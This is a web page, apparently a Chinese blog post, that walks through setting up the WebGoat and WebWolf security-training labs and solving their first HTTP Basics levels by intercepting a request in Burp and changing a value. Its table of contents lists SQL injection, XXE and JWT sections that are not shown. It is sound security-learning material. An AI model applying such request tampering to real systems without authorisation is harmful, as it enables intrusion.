<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#6200ee"><meta name="author" content="m0re"><meta name="copyright" content="m0re"><meta name="generator" content="Hexo 5.1.0"><meta name="theme" content="hexo-theme-yun"><title>WebGoat靶场搭建及通关记录(一) | m0re的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.24/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_j5gk85dg4pf.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="icon" href="/m0re.ico"><link rel="mask-icon" href="/m0re.ico" color="#6200ee"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"m0re.top","root":"/","title":"人生路漫漫","version":"1.6.1","mode":"time","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"local_search":{"path":"/search.xml"},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><meta name="description" content="一、搭建靶场靶场环境，只介绍在windows系统中搭建过程。先下载这两个文件https:&#x2F;&#x2F;github.com&#x2F;WebGoat&#x2F;WebGoat&#x2F;releases&#x2F;download&#x2F;v8.1.0&#x2F;webgoat-server-8.1.0.jarhttps:&#x2F;&#x2F;github.com&#x2F;WebGoat&#x2F;WebGoat&#x2F;releases&#x2F;download&#x2F;v8.1.0&#x2F;webwolf-8.1.0.j">
<meta property="og:type" content="article">
<meta property="og:title" content="WebGoat靶场搭建及通关记录(一)">
<meta property="og:url" content="https://m0re.top/posts/a9166075/index.html">
<meta property="og:site_name" content="m0re的小站">
<meta property="og:description" content="一、搭建靶场靶场环境，只介绍在windows系统中搭建过程。先下载这两个文件https:&#x2F;&#x2F;github.com&#x2F;WebGoat&#x2F;WebGoat&#x2F;releases&#x2F;download&#x2F;v8.1.0&#x2F;webgoat-server-8.1.0.jarhttps:&#x2F;&#x2F;github.com&#x2F;WebGoat&#x2F;WebGoat&#x2F;releases&#x2F;download&#x2F;v8.1.0&#x2F;webwolf-8.1.0.j">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815140213600.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200818185243614.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815140848267.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815141431418.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815141023393.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815144902422.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815162412517.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815153959395.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815162637269.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815162902347.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815163052169.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815171944214.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815172806707.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815180729994.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815213613843.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815202715536.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020081520284545.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815203045562.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815203216196.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815203241823.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200815204018657.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200816000903975.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200816000721653.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200816002235579.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200816002549432.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200816003022834.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200816003118149.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817113030131.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817114119981.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817120512583.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817120621642.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817131951956.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817143252541.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817144100191.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817163027242.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817162355710.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817182440855.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817182823546.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200817183007750.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200818184747661.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200818210412128.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200818212605852.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200818210558583.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200818211815343.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200818211031949.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200818235525967.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020081823541586.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center">
<meta property="article:published_time" content="2020-09-01T07:10:58.244Z">
<meta property="article:modified_time" content="2020-09-01T07:51:18.731Z">
<meta property="article:author" content="m0re">
<meta property="article:tag" content="Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20200815140213600.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70#pic_center"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="m0re"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="m0re"><span class="site-author-status" title="穷鬼啊啊啊啊">😭</span></a><div class="site-author-name"><a href="/about/">m0re</a></div><span class="site-name">m0re的小站</span><sub class="site-subtitle"></sub><div class="site-desciption"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">115</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">16</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">49</span></a></div><a class="site-state-item hty-icon-button" href="/Tools/" title="Tools"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/zxcv0221" title="GitHub" target="_blank" style="color:#181717"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" title="哔哩哔哩动画" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://twitter.com/ISm0r3" title="Twitter" target="_blank" style="color:#1da1f2"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-twitter-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:m0re.lxj@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E6%90%AD%E5%BB%BA%E9%9D%B6%E5%9C%BA"><span class="toc-number">2.</span> <span class="toc-text">一、搭建靶场</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E9%80%9A%E5%85%B3%E6%94%BB%E7%95%A5"><span class="toc-number">3.</span> <span class="toc-text">二、通关攻略</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-General"><span class="toc-number">3.1.</span> <span class="toc-text">1.General</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP-Basics"><span class="toc-number">3.1.1.</span> <span class="toc-text">HTTP Basics</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP-Proxies"><span class="toc-number">3.1.2.</span> <span class="toc-text">HTTP Proxies</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-Injection-Flaws"><span class="toc-number">3.2.</span> <span class="toc-text">2.Injection Flaws</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-Injection-advanced"><span class="toc-number">3.2.1.</span> <span class="toc-text">SQL Injection (advanced)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-Injection"><span class="toc-number">3.2.2.</span> <span class="toc-text">SQL Injection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-Injection-mitigation"><span class="toc-number">3.2.3.</span> <span class="toc-text">SQL Injection (mitigation)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XXE"><span class="toc-number">3.2.4.</span> <span class="toc-text">XXE</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-Authentication-Flaws"><span class="toc-number">3.3.</span> <span class="toc-text">3.Authentication Flaws</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Authentication-Bypasses"><span class="toc-number">3.3.1.</span> <span class="toc-text">Authentication Bypasses</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#JWT-tokens"><span class="toc-number">3.3.2.</span> <span class="toc-text">JWT tokens</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">4.</span> <span class="toc-text">总结</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://m0re.top/posts/a9166075/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="m0re"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="m0re的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">WebGoat靶场搭建及通关记录(一)</h1><div class="post-meta"><div class="post-time" style="display:inline-block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <span class="post-meta-icon-text">发表于</span> <time title="创建时间：2020-09-01 15:10:58" itemprop="dateCreated datePublished" datetime="2020-09-01T15:10:58+08:00">2020-09-01</time></div><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span id="busuanzi_value_page_pv"></span></span></span><span class="leancloud_visitors" id="/posts/a9166075/" data-flag-title="WebGoat靶场搭建及通关记录(一)"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span class="leancloud-visitors-count"></span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">网安学习</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/Web/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">Web</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#6200ee;"><hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">

<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p><font color=#999AAA >搭建WebGoat靶场，以前没玩过这个，涉及的知识挺多的，没事打一打。<br></font></p>
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">


<h1 id="一、搭建靶场"><a href="#一、搭建靶场" class="headerlink" title="一、搭建靶场"></a>一、搭建靶场</h1><p><font color=#999AAA >靶场环境，只介绍在windows系统中搭建过程。<br>先下载这两个文件<br><a target="_blank" rel="noopener" href="https://github.com/WebGoat/WebGoat/releases/download/v8.1.0/webgoat-server-8.1.0.jar">https://github.com/WebGoat/WebGoat/releases/download/v8.1.0/webgoat-server-8.1.0.jar</a><br><a target="_blank" rel="noopener" href="https://github.com/WebGoat/WebGoat/releases/download/v8.1.0/webwolf-8.1.0.jar">https://github.com/WebGoat/WebGoat/releases/download/v8.1.0/webwolf-8.1.0.jar</a><br>由于是github的项目，下载时，可能因为网络问题而失败，所以建议用迅雷下载。<br>然后在放到一个专门文件夹内(本人轻微强迫症哈哈，可以随意放)<br>执行下面两条命令就可以了</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">java -jar webgoat-server-8.0.0.M17.jar
java -jar webwolf-8.0.0.M17.jar</code></pre>
<p><img src="https://img-blog.csdnimg.cn/20200815140213600.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>访问<a target="_blank" rel="noopener" href="http://127.0.0.1:8080/">http://127.0.0.1:8080</a>就可以了。<br>注册账号随便弄一个就可以了。<br><font color=#F22225 >**<em>补充一个坑，可能会遇到的一个问题**</em><br>就是搭建好靶场后没什么问题，第二次进入的问题。(免得像我一样的小白不知道而再去重新搭建，浪费时间)<br>先描述一下问题：就是访问<code>http://127.0.0.1:8080</code>时浏览器返回找不到网页了，没有进入到靶场环境。附图如下：<br><img src="https://img-blog.csdnimg.cn/20200818185243614.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>这个不是靶场出问题了，而是不是第一次进入靶场，原来已经进入过并注册了用户名和密码了，就要进入登录界面直接登录了。所以环境没问题。<br>解决办法也很简单：访问这个——<a target="_blank" rel="noopener" href="http://127.0.0.1:8080/WebGoat/login">http://127.0.0.1:8080/WebGoat/login</a>，webwolf也是同理。就不多嘴了哈。</p>
<h1 id="二、通关攻略"><a href="#二、通关攻略" class="headerlink" title="二、通关攻略"></a>二、通关攻略</h1><p><font color=#999AAA >Introduction的部分就是检查靶场功能。看不懂英文的话，建议用翻译插件翻译一下。</p>
<h2 id="1-General"><a href="#1-General" class="headerlink" title="1.General"></a>1.General</h2><h3 id="HTTP-Basics"><a href="#HTTP-Basics" class="headerlink" title="HTTP Basics"></a>HTTP Basics</h3><p><font color=#F22225 >第二关<br><font color=#999AAA >就是输入用户名就可以了，放一张图。<br><img src="https://img-blog.csdnimg.cn/20200815140848267.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#F22225 >第三关<br><font color=#999AAA >提示是需要使用Owasp zap进行抓包查看，这里使用burp进行<br><img src="https://img-blog.csdnimg.cn/20200815141431418.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>将1改为6放包，然后答题正确。<br><img 